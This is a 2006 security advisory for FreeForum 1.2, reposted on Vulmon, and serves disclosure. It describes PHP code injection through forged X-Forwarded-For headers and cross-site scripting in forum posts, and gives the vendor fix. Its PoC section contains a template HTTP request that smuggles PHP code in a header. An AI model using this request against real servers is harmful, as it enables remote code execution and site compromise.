Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

EV0089.txt

Related Vulnerabilities: CVE-2006-0957   CVE-2006-0958  
Publish Date: 11 Mar 2006
Author: Aliaksandr Hartsuyeu, evuln.com
Source 
                New eVuln Advisory:
FreeForum PHP Code Execution & Multiple XSS Vulnerabilities
http://evuln.com/vulns/89/summary.html

--------------------Summary----------------
eVuln ID: EV0089
CVE: CVE-2006-0957 CVE-2006-0958
Vendor: ZoneO-Soft
Vendor's Web Site: http://soft.zoneo.net/
Software: FreeForum
Sowtware's Web Site: http://soft.zoneo.net/freeForum/
Versions: 1.2
Critical Level: Dangerous
Type: Multiple Vulnerabilities
Class: Remote
Status: Patched
PoC/Exploit: Available
Solution: Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

-----------------Description---------------
1. PHP Code Execution Vulnerability.

Vulnerable Script: func.inc.php

Variables $_SERVER[HTTP_X_FORWARDED_FOR] $_SERVER[HTTP_CLIENT_IP] are not sanitized before being written into 'Data/flood.db.php' file. This can be used to inject arbitrary PHP code by posting HTTP query with fake X-Forwarded-For or Client-ip values.

System access is possible.


2. Multiple Cross-Site Scripting

Vulnerable Script: func.inc.php

Variables $name $subject are not properly sanitized. This can be used to post message with arbitrary HTML or JavaScript code.

--------------PoC/Exploit----------------------
Available at: http://evuln.com/vulns/89/exploit.html

PerlBlog Multiple Vulnerabilities


   PoC/Exploit

   1. PHP Code Execution Example.
   HTTP Query:
   POST /freeforum/index.php HTTP/1.0
   Host: [host]
   X-Forwarded-For: anyIP<? [code] ?>
   Content-Length: 91
   name=qqq&email=qqq@qqq.com&subject=qqq&text=qqq&mode=postanswer&thread=1&cat=1&submit=Add

   2. Cross-Site Scripting Example.
   URL: http://[host]/freeforum/index.php
   Your name: [XSS]
   Subject: [XSS]

--------------Solution---------------------
Vendor-provided solution is available now.
Install or Upgrade to version 1.2.1

http://soft.zoneo.net/freeForum/changes.php

--------------Credit-----------------------
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)


Regards,
Aliaksandr Hartsuyeu
http://evuln.com - Penetration Testing Services
.
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started